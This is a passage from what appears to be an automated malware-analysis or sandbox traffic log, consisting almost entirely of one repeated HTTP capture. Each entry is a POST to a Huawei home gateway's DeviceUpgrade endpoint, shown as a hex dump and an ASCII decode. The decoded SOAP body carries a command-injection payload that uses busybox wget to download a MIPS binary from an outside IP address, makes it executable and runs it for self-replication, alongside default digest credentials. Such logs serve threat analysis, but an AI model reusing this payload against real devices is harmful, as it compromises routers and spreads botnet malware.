63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 